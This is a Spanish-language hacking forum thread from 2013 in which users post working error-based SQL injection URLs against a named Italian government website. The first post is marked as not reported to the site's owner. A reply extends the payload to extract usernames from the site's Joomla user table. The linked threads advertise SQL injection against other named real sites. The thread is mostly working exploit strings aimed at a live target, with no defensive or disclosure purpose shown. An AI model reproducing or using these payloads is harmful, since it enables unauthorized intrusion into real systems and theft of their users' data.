SQLI Doble Query www.uibm.gov.it

  • 3 Respuestas
  • 2199 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Cronos

  • *
  • Ex-Staff
  • *****
  • Mensajes: 1000
  • Actividad:
    0%
  • Country: 00
  • Reputación 1
  • sudo su
    • Ver Perfil
    • Email

SQLI Doble Query www.uibm.gov.it

  • en: Junio 28, 2013, 03:30:05 pm


SQL: http://www.uibm.gov.it/index.php?option=com_content&id=2006480' and (select 1 from (select count(*),concat(0x7e,version(),floor(rand(0)*2))a from information_schema.tables group by a)b) -- -

Reportado: No

Saludos,, Cronos.-
« Última modificación: Enero 10, 2015, 01:13:35 pm por Expermicid »

Desconectado hdbreaker

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
  • Skype: hdbreaker96
  • Twitter: @SecSignal
    • Ver Perfil
    • Security Signal
    • Email

Re:SQLI Doble Query www.uibm.gov.it

  • en: Junio 28, 2013, 04:09:21 pm
Hola vengo a Completarla! Buen fallo cronos!

http://www.uibm.gov.it/index.php?option=com_content&id=2006480 and(select 1 from(select min(0),(select concat(0x7e,(select concat(username) from jos_users limit 0,1),0x7e,floor(rand(0)*2)))a from information_schema.tables group by a)b)


Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Cronos

  • *
  • Ex-Staff
  • *****
  • Mensajes: 1000
  • Actividad:
    0%
  • Country: 00
  • Reputación 1
  • sudo su
    • Ver Perfil
    • Email

Re:SQLI Doble Query www.uibm.gov.it

  • en: Junio 28, 2013, 04:55:54 pm
Gracias bro :)

Desconectado arthusu

  • *
  • Ex-Staff
  • *****
  • Mensajes: 555
  • Actividad:
    0%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
  • Skype: arthusuxD
    • Ver Perfil
    • Arthusu BLOG

Re:SQLI Doble Query www.uibm.gov.it

  • en: Junio 28, 2013, 10:27:37 pm
Excelente Cronos aqui te va con union based :D XDDDDD salu2 buen post espero que sigas asi bro ^^



Le metiste <body>! <--- WTF? No es cierto hd_breaker xD
« Última modificación: Julio 22, 2013, 11:09:17 pm por arthusu »
Pentest - Hacking & Security Services

Contact me: [email protected]

 

[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 1783
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2473
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2219
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1978
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 4676
Último mensaje Junio 02, 2017, 06:39:33 am
por baah